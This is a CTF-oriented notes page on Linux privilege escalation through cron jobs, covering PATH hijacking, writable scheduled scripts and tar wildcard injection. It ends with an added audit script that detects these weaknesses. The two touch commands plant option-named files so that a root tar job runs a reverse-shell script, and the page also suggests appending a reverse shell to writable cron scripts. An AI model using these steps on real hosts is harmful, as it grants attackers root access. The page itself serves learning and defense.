# Cron Jobs

{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cron-jobs>" %}

Read the cron jobs, then check the permissions on any scripts they run.

```
cat /etc/crontab
```

{% hint style="info" %}
In CTF situations, if any custom scripts are set up as cron jobs, they're most likely there for a reason, especially ones running as root.
{% endhint %}

Systemd timers could also be running, which essentially do the same thing.

```
systemctl list-timers --all
```

## Cron Paths

If the script isn't referenced by its full file path, cron looks for it in the first directory of the PATH variable first.

<figure><img src="/files/8pkvTLW7jgZ4toZ8l6gJ" alt=""><figcaption></figcaption></figure>

## Cron Wildcards

If we only have read permissions on a script but it is using a wildcard with another command, we can make that command run something malicious instead

<figure><img src="/files/cE7hw0A2JydyzJGFH7rY" alt=""><figcaption></figcaption></figure>

With tar specifically we can make it run a script using touch and checkpoints

```
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ rev.sh
```

## Cron File Overwrites

Check the file permissions on the scheduled script; if it is writable, add a reverse shell to it.
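To check a host for the three conditions covered on this page (a command scheduled without its full path, a scheduled script that is group- or world-writable, and a bare wildcard inside a scheduled script), the audit script below is an added example and not part of the original notes. The finding labels, the `/usr/bin:/bin` fallback PATH and the sample files are assumptions made for the example.

```shell
#!/bin/sh
# Added example: audit a system crontab (min hour dom mon dow user command)
# for the three weaknesses on this page. Finding labels are made up here.

# True if $1 is writable by group or other (mode bits, symlinks followed).
loose() {
    [ -n "$(find -L "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

audit_crontab() {
    crontab=$1
    # The last PATH= line wins; /usr/bin:/bin is an assumed fallback.
    cron_path=$(sed -n 's/^PATH=//p' "$crontab" | tail -n 1)
    dirs=$(printf '%s' "${cron_path:-/usr/bin:/bin}" | tr ':' ' ')
    # Skip comments, blank lines and VAR=value lines; @reboot-style lines are not handled.
    grep -Ev '^[[:space:]]*(#|$|@)|^[A-Za-z_]+=' "$crontab" |
    while read -r _m _h _dom _mon _dow _user cmd _args; do
        script=$cmd
        case $cmd in
        /*) ;;
        *)  echo "RELATIVE $cmd"
            script=
            for d in $dirs; do
                loose "$d" && echo "PATHDIR $d is searched for $cmd and is group/world-writable"
                if [ -x "$d/$cmd" ]; then script=$d/$cmd; break; fi
            done ;;
        esac
        [ -f "$script" ] || continue
        loose "$script" && echo "WRITABLE $script"
        # A bare * word expands to file names, and names starting with "-" are then
        # read as options. Globs such as /dir/* expand to "/dir/..." and are not.
        grep -nE '^[^#]*[[:space:]]\*([[:space:]]|$)' "$script" |
            while IFS=: read -r n _rest; do echo "WILDCARD $script:$n"; done
    done
}

# Constructed sample: a crontab plus two scripts under a temp dir.
make_sample() {
    t=$(mktemp -d); mkdir "$t/writable" "$t/safe"; chmod 777 "$t/writable"
    printf '#!/bin/sh\ncd /home/user\ntar czf /tmp/backup.tgz *\n' > "$t/safe/backup.sh"
    printf '#!/bin/sh\nrm -rf /tmp/cache/*\n' > "$t/safe/clean.sh"
    chmod 755 "$t/safe" "$t/safe/backup.sh"; chmod 777 "$t/safe/clean.sh"
    printf 'PATH=%s\n* * * * * root backup.sh\n*/5 * * * * root %s\n' \
        "$t/writable:$t/safe" "$t/safe/clean.sh" > "$t/crontab"
    echo "$t/crontab"
}

audit_crontab "${1:-$(make_sample)}"
```

Pass a crontab path as the first argument to audit that file instead of the constructed sample.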


